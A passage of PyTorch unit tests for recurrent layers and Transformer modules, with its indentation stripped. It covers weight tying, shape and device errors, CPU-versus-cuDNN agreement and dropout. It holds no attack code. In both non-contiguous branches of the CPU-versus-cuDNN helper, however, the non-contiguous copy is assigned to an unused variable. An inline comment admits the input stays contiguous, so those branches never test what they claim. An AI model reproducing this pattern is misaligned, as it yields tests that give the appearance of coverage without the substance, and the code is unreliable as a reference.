with warnings.catch_warnings(record=True) as w:
output_noncontig = rnn(input, hx)
if first_warn:
self.assertEqual(len(w), 1)
self.assertIn('weights are not part of single contiguous chunk of memory', w[0].message.args[0])
first_warn = False
warnings.resetwarnings()
output_noncontig[0].sum().backward()
grads_noncontig = [v.grad.data.clone() for v in all_vars]
for v in all_vars:
v.grad.data.zero_()
self.assertEqual(output, output_noncontig)
self.assertEqual(grads_noncontig, grads)
# Make sure these still share storage
weight_data[:] = 4
self.assertEqual(weight_data, all_vars[4].data)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_cudnn_weight_tying(self):
rnns = [
nn.LSTM(10, 20, batch_first=True, bidirectional=True),
nn.LSTM(10, 20, batch_first=True, bidirectional=True, proj_size=10),
nn.GRU(10, 20, batch_first=True, bidirectional=True),
nn.RNN(10, 20, batch_first=True, bidirectional=True)
]
for rnn in rnns:
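# Tie the reverse input bias to the forward one (shared Parameter) and
# check that CUDA and CPU paths still agree after an optimizer step.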
rnn.bias_ih_l0_reverse = rnn.bias_ih_l0
rnn.cuda()
input = torch.randn(5, 4, 10, requires_grad=True, device="cuda")
hx = torch.randn(2, 5, 20, requires_grad=True, device="cuda")
all_vars = [input, hx] + list(rnn.parameters())
opt = torch.optim.SGD(rnn.parameters(), lr=0.1)
opt.zero_grad()
if isinstance(rnn, nn.LSTM):
# LSTM with projections has different hx size
if rnn.proj_size > 0:
hx = torch.randn(2, 5, 10, requires_grad=True, device="cuda")
all_vars[1] = hx
cx = torch.randn(2, 5, 20, requires_grad=True, device="cuda")
all_vars[2:2] = [cx]
hx = (hx, cx)
with warnings.catch_warnings(record=True) as w:
output = rnn(input, hx)
output[0].sum().backward()
opt.step()
with warnings.catch_warnings(record=True) as w:
output_cuda = rnn(input, hx)
rnn.cpu()
hx = (hx[0].cpu(), hx[1].cpu()) if isinstance(rnn, nn.LSTM) else hx.cpu()
output_cpu = rnn(input.cpu(), hx)
self.assertEqual(output_cuda, output_cpu)
def test_transformer_args_check(self):
model_name = 'Transformer'
d_model = 128
nhead = 4
num_encoder_layers = 2
num_decoder_layers = 3
dim_feedforward = 65
dropout = 0.3
bsz = 3
seq_len = 35
tgt_len = 15
activations = [F.relu, F.gelu]
wrong_bsz = 7
wrong_d_model = 63
wrong_nhead = 5
wrong_activation = "abc"
def test(encoder_input_shape, decoder_input_shape,
src_mask_len=None, tgt_mask_len=None, memory_mask_size=None,
src_key_padding_mask_size=None, tgt_key_padding_mask_size=None,
memory_key_padding_mask_size=None):
encoder_input = torch.randn(encoder_input_shape)
decoder_input = torch.randn(decoder_input_shape)
model = getattr(nn, model_name)(d_model, nhead, num_encoder_layers,
num_decoder_layers, dim_feedforward, dropout)
if src_mask_len is not None:
src_mask = model.generate_square_subsequent_mask(src_mask_len)
else:
src_mask = None
if tgt_mask_len is not None:
tgt_mask = model.generate_square_subsequent_mask(tgt_mask_len)
else:
tgt_mask = None
if memory_mask_size is not None:
memory_mask = torch.rand(memory_mask_size)
else:
memory_mask = None
if src_key_padding_mask_size is not None:
src_key_padding_mask = torch.rand(src_key_padding_mask_size) >= 0.5
else:
src_key_padding_mask = None
if tgt_key_padding_mask_size is not None:
tgt_key_padding_mask = torch.rand(tgt_key_padding_mask_size) >= 0.5
else:
tgt_key_padding_mask = None
if memory_key_padding_mask_size is not None:
memory_key_padding_mask = torch.rand(memory_key_padding_mask_size) >= 0.5
else:
memory_key_padding_mask = None
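# Every invocation below supplies at least one malformed shape or mask,
# so the forward pass is expected to raise RuntimeError.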
with self.assertRaises(RuntimeError):
model(encoder_input, decoder_input,
src_mask=src_mask,
tgt_mask=tgt_mask,
memory_mask=memory_mask,
src_key_padding_mask=src_key_padding_mask,
tgt_key_padding_mask=tgt_key_padding_mask,
memory_key_padding_mask=memory_key_padding_mask)
correct_encoder_input_shape = (seq_len, bsz, d_model)
correct_decoder_input_shape = (tgt_len, bsz, d_model)
def update_shape(shape, dim, new_dim_size):
new_shape = list(shape)
new_shape[dim] = new_dim_size
return tuple(new_shape)
# Incorrect encoder_input batch size
encoder_input_shape = update_shape(correct_encoder_input_shape, 1, wrong_bsz)
decoder_input_shape = correct_decoder_input_shape
test(encoder_input_shape, decoder_input_shape)
# Incorrect decoder_input batch size
encoder_input_shape = correct_encoder_input_shape
decoder_input_shape = update_shape(correct_decoder_input_shape, 1, wrong_bsz)
test(encoder_input_shape, decoder_input_shape)
# Incorrect encoder_input input size
encoder_input_shape = update_shape(correct_encoder_input_shape, 2, wrong_d_model)
decoder_input_shape = correct_decoder_input_shape
test(encoder_input_shape, decoder_input_shape)
# Incorrect decoder_input input size
encoder_input_shape = correct_encoder_input_shape
decoder_input_shape = update_shape(correct_decoder_input_shape, 2, wrong_d_model)
test(encoder_input_shape, decoder_input_shape)
# Incorrect nhead
encoder_input_shape = correct_encoder_input_shape
decoder_input_shape = correct_decoder_input_shape
with self.assertRaises(AssertionError):
model = getattr(nn, model_name)(d_model, wrong_nhead, num_encoder_layers,
num_decoder_layers, dim_feedforward, dropout)
# Incorrect src_mask
encoder_input_shape = correct_encoder_input_shape
decoder_input_shape = correct_decoder_input_shape
wrong_src_mask_size = seq_len + 1
test(encoder_input_shape, decoder_input_shape, src_mask_len=wrong_src_mask_size)
# Incorrect tgt_mask
encoder_input_shape = correct_encoder_input_shape
decoder_input_shape = correct_decoder_input_shape
wrong_tgt_mask_size = tgt_len + 1
test(encoder_input_shape, decoder_input_shape, tgt_mask_len=wrong_tgt_mask_size)
# Incorrect memory_mask
encoder_input_shape = correct_encoder_input_shape
decoder_input_shape = correct_decoder_input_shape
wrong_tgt_mask_size = tgt_len + 1
test(encoder_input_shape, decoder_input_shape,
memory_mask_size=(wrong_tgt_mask_size, wrong_src_mask_size))
# Incorrect src_key_padding_mask
encoder_input_shape = correct_encoder_input_shape
decoder_input_shape = correct_decoder_input_shape
with self.assertRaises(AssertionError):
test(encoder_input_shape, decoder_input_shape,
src_key_padding_mask_size=(wrong_bsz, wrong_src_mask_size))
# Incorrect tgt_key_padding_mask
encoder_input_shape = correct_encoder_input_shape
decoder_input_shape = correct_decoder_input_shape
with self.assertRaises(AssertionError):
test(encoder_input_shape, decoder_input_shape,
tgt_key_padding_mask_size=(wrong_bsz, wrong_tgt_mask_size))
# Incorrect memory_key_padding_mask
encoder_input_shape = correct_encoder_input_shape
decoder_input_shape = correct_decoder_input_shape
with self.assertRaises(AssertionError):
test(encoder_input_shape, decoder_input_shape,
memory_key_padding_mask_size=(wrong_bsz, wrong_src_mask_size))
# Correct activations
for activation in activations:
model = getattr(nn, model_name)(d_model, nhead, num_encoder_layers, num_decoder_layers,
dim_feedforward, dropout, activation)
# Incorrect activation
with self.assertRaises(RuntimeError):
model = getattr(nn, model_name)(d_model, nhead, num_encoder_layers, num_decoder_layers,
dim_feedforward, dropout, wrong_activation)
def test_transformer_layer_args_check(self):
model_names = ['TransformerEncoderLayer', 'TransformerDecoderLayer']
d_model = 128
nhead = 4
dim_feedforward = 65
dropout = 0.3
bsz = 3
seq_len = 35
tgt_len = 15
activations = [F.relu, F.gelu]
wrong_activation = "abc"
encoder_input_shape = (seq_len, bsz, d_model)
decoder_input_shape = (tgt_len, bsz, d_model)
encoder_input = torch.randn(encoder_input_shape)
decoder_input = torch.randn(decoder_input_shape)
for model_name in model_names:
for activation in activations:
model = getattr(nn, model_name)(d_model, nhead, dim_feedforward,
dropout, activation)
# Incorrect activation
for model_name in model_names:
with self.assertRaises(RuntimeError):
model = getattr(nn, model_name)(d_model, nhead, dim_feedforward,
dropout, wrong_activation)
def test_rnn_args_check(self):
input_size = 3
hidden_size = 5
num_layers = 2
batch_size = 4
seq_len = 6
num_directions = 1
bad_size = 7 # prime, so no valid size divides it and shapes cannot coincide by accident.
def test(input_shape, hidden_shape, mode):
for input, hidden in get_inputs(input_shape, hidden_shape, mode):
model = getattr(nn, mode)(input_size, hidden_size, num_layers)
self.assertRaises(RuntimeError, lambda: model(input, hidden))
correct_input_shape = (seq_len, batch_size, input_size)
correct_hidden_shape = (num_layers * num_directions, batch_size, hidden_size)
def update_shape(shape, dim, new_dim_size):
new_shape = list(shape)
new_shape[dim] = new_dim_size
return tuple(new_shape)
def get_inputs(input_shape, hidden_shape, mode):
'''Return a list of (input, hidden) tuples to feed to a model.'''
input = torch.randn(input_shape)
hidden = torch.randn(hidden_shape)
if mode != 'LSTM':
return [(input, hidden)]
if hidden_shape == correct_hidden_shape:
return [(input, (hidden, hidden))]
good_hidden = torch.randn(correct_hidden_shape)
return [
(input, (hidden, good_hidden)),
(input, (good_hidden, hidden)),
]
rnn_modes = ['RNN', 'GRU', 'LSTM']
for mode in rnn_modes:
# Incorrect input batch size
input_shape = update_shape(correct_input_shape, 1, bad_size)
hidden_shape = correct_hidden_shape
test(input_shape, hidden_shape, mode)
# Incorrect hidden batch size
input_shape = correct_input_shape
hidden_shape = update_shape(correct_hidden_shape, 1, bad_size)
test(input_shape, hidden_shape, mode)
# Incorrect input size
input_shape = update_shape(correct_input_shape, 2, bad_size)
hidden_shape = correct_hidden_shape
test(input_shape, hidden_shape, mode)
# Incorrect hidden size
input_shape = correct_input_shape
hidden_shape = update_shape(correct_hidden_shape, 2, bad_size)
test(input_shape, hidden_shape, mode)
# Incorrect hidden[0]
input_shape = correct_input_shape
hidden_shape = update_shape(correct_hidden_shape, 0, bad_size)
test(input_shape, hidden_shape, mode)
def test_projections_lstm_args_check(self):
input_size = 3
hidden_size = 5
proj_size = 2
num_layers = 2
batch_size = 4
seq_len = 6
num_directions = 1
bad_size = 7 # prime, so no valid size divides it and shapes cannot coincide by accident.
def test(input_shape, hidden_h_shape, hidden_c_shape):
for input, hidden in get_inputs(input_shape, hidden_h_shape, hidden_c_shape):
model = nn.LSTM(input_size, hidden_size, num_layers, proj_size=proj_size)
self.assertRaises(RuntimeError, lambda: model(input, hidden))
correct_input_shape = (seq_len, batch_size, input_size)
correct_hidden_h_shape = (num_layers * num_directions, batch_size, proj_size)
correct_hidden_c_shape = (num_layers * num_directions, batch_size, hidden_size)
def update_shape(shape, dim, new_dim_size):
new_shape = list(shape)
new_shape[dim] = new_dim_size
return tuple(new_shape)
def get_inputs(input_shape, hidden_h_shape, hidden_c_shape):
'''Return a list of (input, hidden) tuples to feed to a model.'''
input = torch.randn(input_shape)
hidden_h = torch.randn(hidden_h_shape)
hidden_c = torch.randn(hidden_c_shape)
return [(input, (hidden_h, hidden_c))]
# Incorrect input batch size
input_shape = update_shape(correct_input_shape, 1, bad_size)
test(input_shape, correct_hidden_h_shape, correct_hidden_c_shape)
# Incorrect hidden batch size
input_shape = correct_input_shape
hidden_h_shape = update_shape(correct_hidden_h_shape, 1, bad_size)
hidden_c_shape = update_shape(correct_hidden_c_shape, 1, bad_size)
test(input_shape, hidden_h_shape, hidden_c_shape)
# Incorrect input size
input_shape = update_shape(correct_input_shape, 2, bad_size)
test(input_shape, correct_hidden_h_shape, correct_hidden_c_shape)
# Incorrect hidden size
input_shape = correct_input_shape
hidden_h_shape = update_shape(correct_hidden_h_shape, 2, bad_size)
hidden_c_shape = update_shape(correct_hidden_c_shape, 2, bad_size)
test(input_shape, hidden_h_shape, hidden_c_shape)
# Incorrect hidden[0]
input_shape = correct_input_shape
hidden_h_shape = update_shape(correct_hidden_h_shape, 0, bad_size)
hidden_c_shape = update_shape(correct_hidden_c_shape, 0, bad_size)
test(input_shape, hidden_h_shape, hidden_c_shape)
# Incorrect proj size = hidden size
input_shape = correct_input_shape
hidden_h_shape = update_shape(correct_hidden_h_shape, 0, hidden_size)
hidden_c_shape = correct_hidden_c_shape
test(input_shape, hidden_h_shape, hidden_c_shape)
# Incorrect proj size != hidden size
input_shape = correct_input_shape
hidden_h_shape = update_shape(correct_hidden_h_shape, 0, bad_size)
hidden_c_shape = correct_hidden_c_shape
test(input_shape, hidden_h_shape, hidden_c_shape)
# Incorrect cell size != hidden size
input_shape = correct_input_shape
hidden_h_shape = correct_hidden_h_shape
hidden_c_shape = update_shape(correct_hidden_c_shape, 0, bad_size)
test(input_shape, hidden_h_shape, hidden_c_shape)
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_rnn_check_device(self):
input_size = 3
hidden_size = 5
num_layers = 2
batch_size = 4
seq_len = 6
num_directions = 1
correct_input_shape = (seq_len, batch_size, input_size)
correct_hidden_shape = (num_layers * num_directions, batch_size, hidden_size)
rnn_modes = ['RNN', 'GRU', 'LSTM']
for mode in rnn_modes:
model = getattr(nn, mode)(input_size, hidden_size, num_layers)
input = torch.randn(correct_input_shape)
hidden = torch.randn(correct_hidden_shape)
# input and weights are not at the same device
with self.assertRaisesRegex(RuntimeError,
"Input and parameter tensors are not at the same device"):
model(input.to('cuda:0'))
# input and hiddens are not at the same device
with self.assertRaisesRegex(RuntimeError,
r"Input and hidden tensors are not at the same device"):
if mode == 'LSTM':
model(input, (hidden.to('cuda:0'), hidden.to('cuda:0')))
else:
model(input, hidden.to('cuda:0'))
# hidden tensors are not at the same CUDA device
if mode == 'LSTM':
with self.assertRaisesRegex(RuntimeError,
"Input and hidden tensors are not at the same device"):
model(input.to('cuda:0'), (hidden.to('cuda:0'), hidden.to('cuda:1')))
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_projections_lstm_check_device(self):
input_size = 3
hidden_size = 5
proj_size = 2
num_layers = 2
batch_size = 4
seq_len = 6
num_directions = 1
correct_input_shape = (seq_len, batch_size, input_size)
correct_hidden_h_shape = (num_layers * num_directions, batch_size, proj_size)
correct_hidden_c_shape = (num_layers * num_directions, batch_size, hidden_size)
model = nn.LSTM(input_size, hidden_size, num_layers, proj_size=proj_size)
input = torch.randn(correct_input_shape)
hidden_h = torch.randn(correct_hidden_h_shape)
hidden_c = torch.randn(correct_hidden_c_shape)
# input and weights are not at the same device
with self.assertRaisesRegex(RuntimeError,
"Input and parameter tensors are not at the same device"):
model(input.to('cuda:0'))
# input and hiddens are not at the same device
with self.assertRaisesRegex(RuntimeError,
r"Input and hidden tensors are not at the same device"):
model(input, (hidden_h.to('cuda:0'), hidden_c.to('cuda:0')))
# hidden tensors are not at the same CUDA device
with self.assertRaisesRegex(RuntimeError,
"Input and hidden tensors are not at the same device"):
model(input.to('cuda:0'), (hidden_h.to('cuda:0'), hidden_c.to('cuda:1')))
def test_rnn_initial_hidden_state(self):
rnn_modes = ['RNN', 'GRU', 'LSTM']
for mode in rnn_modes:
rnn = getattr(nn, mode)(30, 20, 2)
input = torch.randn(10, 32, 30)
hidden = torch.zeros(2, 32, 20)
if mode == 'LSTM':
hidden = (hidden, hidden)
output1, hidden1 = rnn(input, hidden)
output2, hidden2 = rnn(input)
self.assertEqual(output1, output2)
self.assertEqual(hidden1, hidden2)
def test_projections_lstm_initial_hidden_state(self):
for bidir in [False, True]:
rnn = nn.LSTM(30, 20, 2, bidirectional=bidir, proj_size=10)
num_dirs = 2 if bidir else 1
input = torch.randn(10, 32, 30)
hidden_h = torch.zeros(2 * num_dirs, 32, 10)
hidden_c = torch.zeros(2 * num_dirs, 32, 20)
hidden = (hidden_h, hidden_c)
output1, hidden1 = rnn(input, hidden)
output2, hidden2 = rnn(input)
self.assertEqual(output1, output2)
self.assertEqual(hidden1, hidden2)
def test_projections_errors_on_gru_and_rnn(self):
error_msg = "proj_size argument is only supported for LSTM, not RNN or GRU"
for mode in ['RNN', 'GRU']:
with self.assertRaisesRegex(ValueError, error_msg):
rnn = getattr(nn, mode)(30, 20, 2, proj_size=10)
def _test_RNN_cpu_vs_cudnn(self, dropout, dtype=torch.double):
def forward_backward(cuda, rnn, input_val, grad_output, weights_val, hx_val, grad_hy,
cx_val=None, grad_cy=None):
is_lstm = isinstance(rnn, nn.LSTM)
for x_layer, y_layer in zip(rnn.all_weights, weights_val):
for x, y in zip(x_layer, y_layer):
x.data.copy_(y.data)
if isinstance(input_val, rnn_utils.PackedSequence):
input = rnn_utils.PackedSequence(
input_val.data.data.requires_grad_(True), input_val.batch_sizes)
input_var = input.data
else:
input = input_val.clone().requires_grad_(True)
input_var = input
if is_lstm:
if cx_val is None:
hx = (hx_val.clone().requires_grad_(True),
hx_val.add(1).requires_grad_(True))
else:
hx = (hx_val.clone().requires_grad_(True),
cx_val.add(1).requires_grad_(True))
else:
hx = hx_val.clone().requires_grad_(True)
if cuda:
rnn.cuda()
input_var.data = input_var.data.cuda()
if is_lstm:
hx[0].data = hx[0].data.cuda()
hx[1].data = hx[1].data.cuda()
else:
hx.data = hx.data.cuda()
grad_hy = grad_hy.cuda()
if grad_cy is not None:
grad_cy = grad_cy.cuda()
grad_output = grad_output.cuda()
output, hy = rnn(input, hx)
if isinstance(output, rnn_utils.PackedSequence):
output = output.data
if is_lstm:
if grad_cy is None:
torch.autograd.backward([output, hy[0], hy[1]], [grad_output, grad_hy, grad_hy + 1])
else:
torch.autograd.backward([output, hy[0], hy[1]], [grad_output, grad_hy, grad_cy + 1])
else:
torch.autograd.backward([output, hy], [grad_output, grad_hy])
return {'output': output.data,
'hy': hy[0].data if is_lstm else hy.data,
'weights': rnn.all_weights,
'grad_input': input_var.grad.data,
'grad_hx': hx[0].grad.data if is_lstm else hx.grad.data,
'cy': hy[1].data if is_lstm else None,
'grad_cx': hx[1].grad.data if is_lstm else None}
input_size = 10
hidden_size = 6
proj_size = 3
num_layers = 2
seq_length = 7
batch = 6
def make_noncontig(tensor):
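# Stack the tensor with a zeroed clone along a new trailing dim, then
# select index 1: same values, but the result is a non-contiguous view.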
ndim = tensor.dim()
return torch.stack([tensor.clone().zero_(), tensor], ndim).select(ndim, 1)
def compare_cpu_gpu(outputs_cpu, outputs_gpu):
self.assertEqual(list(outputs_cpu.keys()), list(outputs_gpu.keys()))
for key in outputs_cpu.keys():
if key != 'weights':
self.assertEqual(outputs_cpu[key], outputs_gpu[key], atol=5e-5, rtol=0, msg=key)
# check grad weights separately, as nested dict
for cpu_layer_weight, gpu_layer_weight in zip(outputs_cpu['weights'], outputs_gpu['weights']):
for (cpu_weight, gpu_weight) in zip(cpu_layer_weight, gpu_layer_weight):
self.assertEqual(cpu_weight.grad.data, gpu_weight.grad.data, atol=5e-5, rtol=0)
for module in (nn.RNN, nn.LSTM, nn.GRU):
for bias, bidirectional, batch_first, contig, variable_len, lens_as_tensor \
in product((True, False), repeat=6):
num_directions = 2 if bidirectional else 1
if batch_first:
input_val = torch.randn(batch, seq_length, input_size, dtype=dtype)
grad_output = torch.randn(batch, seq_length, hidden_size * num_directions, dtype=dtype)
else:
input_val = torch.randn(seq_length, batch, input_size, dtype=dtype)
grad_output = torch.randn(seq_length, batch, hidden_size * num_directions, dtype=dtype)
hx_val = torch.randn(num_layers * num_directions, batch, hidden_size, dtype=dtype)
grad_hy = torch.randn(num_layers * num_directions, batch, hidden_size, dtype=dtype)
if not contig:
grad_output = make_noncontig(grad_output)
grad_hy = make_noncontig(grad_hy)
input_var = make_noncontig(input_val)  # note: input_val itself is left contiguous here
hx_val = make_noncontig(hx_val)
if variable_len:
lengths = [7, 5, 5, 2, 1, 1]
if lens_as_tensor:
lengths = torch.tensor(lengths, dtype=torch.long)
input_val = rnn_utils.pack_padded_sequence(input_val, lengths, batch_first=batch_first)
grad_output = rnn_utils.pack_padded_sequence(grad_output, lengths, batch_first=batch_first).data
rnn = module(input_size,
hidden_size,
num_layers,
bias=bias,
dropout=dropout,
bidirectional=bidirectional,
batch_first=batch_first).to(dtype)
outputs_cpu = forward_backward(
False, rnn, input_val, grad_output, rnn.all_weights, hx_val, grad_hy)
rnn_gpu = module(input_size,
hidden_size,
num_layers,
bias=bias,
dropout=dropout,
bidirectional=bidirectional,
batch_first=batch_first).to(dtype)
outputs_gpu = forward_backward(
True, rnn_gpu, input_val, grad_output, rnn.all_weights, hx_val, grad_hy)
compare_cpu_gpu(outputs_cpu, outputs_gpu)
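# Plain RNNs additionally expose the cell nonlinearity; repeat the
# CPU-vs-cuDNN comparison for both tanh and relu.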
for nonlinearity in ('tanh', 'relu'):
hx_val = torch.randn(num_layers, batch, hidden_size, dtype=dtype)
input_val = torch.randn(seq_length, batch, input_size, dtype=dtype)
grad_output = torch.randn(
seq_length, batch, hidden_size * num_directions, dtype=dtype)
grad_hy = torch.randn(
num_layers * num_directions, batch, hidden_size, dtype=dtype)
rnn = nn.RNN(input_size, hidden_size, num_layers, bias=bias, nonlinearity=nonlinearity).to(dtype)
outputs_cpu = forward_backward(False, rnn, input_val, grad_output, rnn.all_weights, hx_val, grad_hy)
rnn_gpu = nn.RNN(input_size, hidden_size, num_layers, bias=bias, nonlinearity=nonlinearity).to(dtype)
outputs_gpu = forward_backward(True, rnn_gpu, input_val, grad_output, rnn.all_weights, hx_val, grad_hy)
compare_cpu_gpu(outputs_cpu, outputs_gpu)
# checking LSTM with projections
for bias, bidirectional, batch_first, contig, variable_len, lens_as_tensor \
in product((True, False), repeat=6):
num_directions = 2 if bidirectional else 1
if batch_first:
input_val = torch.randn(batch, seq_length, input_size, dtype=dtype)
grad_output = torch.randn(batch, seq_length, proj_size * num_directions, dtype=dtype)
else:
input_val = torch.randn(seq_length, batch, input_size, dtype=dtype)
grad_output = torch.randn(seq_length, batch, proj_size * num_directions, dtype=dtype)
hx_val = torch.randn(num_layers * num_directions, batch, proj_size, dtype=dtype)
cx_val = torch.randn(num_layers * num_directions, batch, hidden_size, dtype=dtype)
grad_hy = torch.randn(num_layers * num_directions, batch, proj_size, dtype=dtype)
grad_cy = torch.randn(num_layers * num_directions, batch, hidden_size, dtype=dtype)
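# With projections, h_t has proj_size features while c_t keeps
# hidden_size, hence the differing hx/cx and grad_hy/grad_cy shapes.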
if not contig:
grad_output = make_noncontig(grad_output)
grad_hy = make_noncontig(grad_hy)
grad_cy = make_noncontig(grad_cy)
input_var = make_noncontig(input_val)  # note: input_val itself is left contiguous here
hx_val = make_noncontig(hx_val)
cx_val = make_noncontig(cx_val)
if variable_len:
lengths = [7, 5, 5, 2, 1, 1]
if lens_as_tensor:
lengths = torch.tensor(lengths, dtype=torch.long)
input_val = rnn_utils.pack_padded_sequence(input_val, lengths, batch_first=batch_first)
grad_output = rnn_utils.pack_padded_sequence(grad_output, lengths, batch_first=batch_first).data
rnn = nn.LSTM(input_size,
hidden_size,
num_layers,
bias=bias,
dropout=dropout,
bidirectional=bidirectional,
batch_first=batch_first,
proj_size=proj_size).to(dtype)
outputs_cpu = forward_backward(
False, rnn, input_val, grad_output, rnn.all_weights,
hx_val, grad_hy, cx_val, grad_cy)
rnn_gpu = nn.LSTM(input_size,
hidden_size,
num_layers,
bias=bias,
dropout=dropout,
bidirectional=bidirectional,
batch_first=batch_first,
proj_size=proj_size).to(dtype)
outputs_gpu = forward_backward(
True, rnn_gpu, input_val, grad_output, rnn.all_weights,
hx_val, grad_hy, cx_val, grad_cy)
compare_cpu_gpu(outputs_cpu, outputs_gpu)
@unittest.skipIf(not TEST_CUDNN, "needs cudnn")
def test_RNN_cpu_vs_cudnn_no_dropout(self):
dtype = torch.double
self._test_RNN_cpu_vs_cudnn(0, dtype)
@unittest.skipIf(not (TEST_CUDNN and (TEST_CUDNN_VERSION if TEST_CUDNN_VERSION else 0) >= 5103), "needs cudnn >= 5.1")
def test_RNN_cpu_vs_cudnn_with_dropout(self):
# Because dropout is random, outputs can be compared exactly only for dropout=0 and dropout=1
self._test_RNN_cpu_vs_cudnn(1)
@unittest.skipIf(not TEST_CUDNN, "needs cudnn")
def test_RNN_cudnn_weight_norm(self):
input_size = 10
hidden_size = 6
num_layers = 2
seq_length = 7
batch = 6
# runs on CPU to acquire expected output
def check_weight_norm(m, name):
input = torch.randn(seq_length, batch, input_size)
expected_output = m(input)
# adds weight normalization
m = torch.nn.utils.weight_norm(m, name=name)
# moves to CUDA
m = m.cuda()
input = input.cuda()
# otherwise, subsequent warnings will be hidden, and further tests rely on them
warnings.simplefilter("always")
self.assertEqual(m(input), expected_output)
# remove weight norm
m = torch.nn.utils.remove_weight_norm(m, name=name)
self.assertEqual(m(input), expected_output)
check_weight_norm(nn.LSTM(input_size, hidden_size, num_layers), 'weight_hh_l0')
check_weight_norm(nn.LSTM(input_size, hidden_size, num_layers, proj_size=3), 'weight_hr_l0')
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
def test_partial_flat_weights(self):
input_size = 10
hidden_size = 6
num_layers = 2
m = nn.LSTM(input_size, hidden_size, num_layers)
inp = torch.randn(3, 2, 10)
out_expected = m(inp)
# deletes an attribute of original LSTM
weight_orig = m.weight_hh_l0
del m.weight_hh_l0
self.assertFalse(hasattr(m, "weight_hh_l0"))
# verifies that moving to CUDA with only some attributes defined
# does not throw an error
m.cuda()
# recompute the weight and make sure that module can be used
m.weight_hh_l0 = weight_orig.cuda()
inp = inp.cuda()
# otherwise, subsequent warnings will be hidden, and further tests rely on them
warnings.simplefilter("always")
self.assertEqual(m(inp)[0].cpu(), out_expected[0])
@unittest.skipIf(not (TEST_CUDNN and (TEST_CUDNN_VERSION if TEST_CUDNN_VERSION else 0) >= 5103), "needs cudnn >= 5.1")
def test_RNN_dropout(self):
# checking the assumption that cuDNN sticks dropout in between
# RNN layers
for p in (0, 0.276, 0.731, 1):
for train in (True, False):
for cuda in (True, False):
rnn = nn.RNN(10, 1000, 2, bias=False, dropout=p, nonlinearity='relu')
if cuda:
rnn.cuda()
if train:
rnn.train()
else:
rnn.eval()
rnn.weight_ih_l0.data.fill_(1)
rnn.weight_hh_l0.data.fill_(1)
rnn.weight_ih_l1.data.fill_(1)
rnn.weight_hh_l1.data.fill_(1)
input = torch.ones(1, 1, 10)
hx = torch.zeros(2, 1, 1000)
if cuda:
input = input.cuda()
hx = hx.cuda()
output, hy = rnn(input, hx)
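# Layer 0 emits exactly 10 from every unit (10 unit inputs, all weights
# 1, zero initial hidden). Inter-layer dropout zeroes units and rescales
# survivors to 10 / (1 - p), so each layer-1 unit sums k * 10 / (1 - p)
# for an integer survivor count k, with expectation 10 * 1000 = 10000;
# the denorm_mod check below verifies the exact-multiple property.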
self.assertEqual(output.data.min(), output.data.max())
output_val = output.data[0][0][0]
if p == 0 or not train:
self.assertEqual(output_val, 10000)
elif p == 1:
self.assertEqual(output_val, 0)
else:
self.assertGreater(output_val, 8000)
self.assertLess(output_val, 12000)
denorm_mod = (output_val * (1 - p)) % 10
self.assertLess(min(denorm_mod, 10 - denorm_mod), 1e-2)
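# hy stacks the final hidden state of both layers: layer 0 stays at 10,
# layer 1 equals the dropout-scaled output value.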
self.assertEqual(hy[0].data.min(), hy[0].data.max())
self.assertEqual(hy[1].data.min(), hy[1].data.max())
self.assertEqual(hy.data[0][0][0], 10)
self.assertEqual(hy.data[1][0][0], output_val)
def test_error_RNN_seq_len_zero(self):
# checking error message when RNN has seq_len = 0
for module in (nn.RNN, nn.LSTM, nn.GRU):
for bidirectional in [True, False]:
for device in torch.testing.get_all_device_types():
input = torch.ones(0, 10, 5)
rnn = module(5, 6, bidirectional=bidirectional)
if device == 'cuda':
rnn.cuda()
input = input.cuda()
with self.assertRaisesRegex(RuntimeError, "Expected sequence length to be larger than 0 in RNN"):
rnn(input)
@unittest.skipIf(not (TEST_CUDNN and (TEST_CUDNN_VERSION if TEST_CUDNN_VERSION else 0) >= 5103), "needs cudnn >= 5.1")
def test_RNN_dropout_state(self):
for p in (0, 0.1234):
for train in (True, False):
for cuda in (True, False):
rnn = nn.RNN(100, 100, 2, bias=False, dropout=p, nonlinearity='relu')
if cuda:
rnn.cuda()
if train:
rnn.train()
else:
rnn.eval()
input = torch.rand(1, 1, 100)
hx = torch.rand(2, 1, 100)
if cuda:
input = input.cuda()
hx = hx.cuda()
output1, hy1 = rnn(input, hx)
output2, hy2 = rnn(input, hx)
buf = io.BytesIO()
torch.save(rnn, buf)
buf.seek(0)
rnn2 = torch.load(buf)
rnn2.flatten_parameters()
output3, hy3 = rnn2(input, hx)
if p == 0 or not train:
self.assertEqual(output1, output2)
self.assertEqual(output1, output3)
self.assertEqual(hy1, hy2)
self.assertEqual(hy1, hy3)
else:
self.assertNotEqual(output1, output2)
self.assertNotEqual(output1, output3)
self.assertNotEqual(hy1, hy2)
self.assertNotEqual(hy1, hy3)
@unittest.skipIf(not (TEST_CUDNN and (TEST_CUDNN_VERSION if TEST_CUDNN_VERSION else 0) >= 5103), "needs cudnn >= 5.1")
def test_RNN_change_dropout(self):
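# Mutating rnn.dropout between forward passes should take effect immediately:
# two consecutive calls match only when p is 0 or 1 or the module is in
# eval mode.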
for train, cuda in product((True, False), repeat=2):
rnn = nn.RNN(100, 100, 2, dropout=0, nonlinearity='relu')
input = torch.rand(3, 2, 100)
if cuda:
input.data = input.data.cuda()
rnn.cuda()
if train:
rnn.train()
else:
rnn.eval()
prev_output = None
for p in (0, 0.5, 0, 0.7, 0.2, 1, 0.2, 0):
rnn.dropout = p
output1, hy1 = rnn(input)
output2, hy2 = rnn(input)
if p == 0 or p == 1 or not train:
self.assertEqual(output1, output2)
self.assertEqual(hy1, hy2)
else:
self.assertNotEqual(output1, output2)
self.assertNotEqual(hy1, hy2)
if prev_output is not None:
if not train:
self.assertEqual(output1.data, prev_output)
self.assertEqual(output2.data, prev_output)
else:
self.assertNotEqual(output1.data, prev_output)
self.assertNotEqual(output2.data, prev_output)
prev_output = output1.data
def test_inplace_thnn(self):
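# In-place activations must not modify the incoming grad_output buffer
# during backward; compare against a clone taken before backward().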
modules = [nn.ReLU, nn.ELU, nn.SELU, nn.CELU, nn.RReLU]
for mod in modules:
r = mod(inplace=True)
input = torch.randn(5, 5, requires_grad=True)
output = r(input + 0)
grad_output = torch.randn(5, 5)
grad_output_clone = grad_output.clone()
output.backward(grad_output)
self.assertEqual(grad_output, grad_output_clone)
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
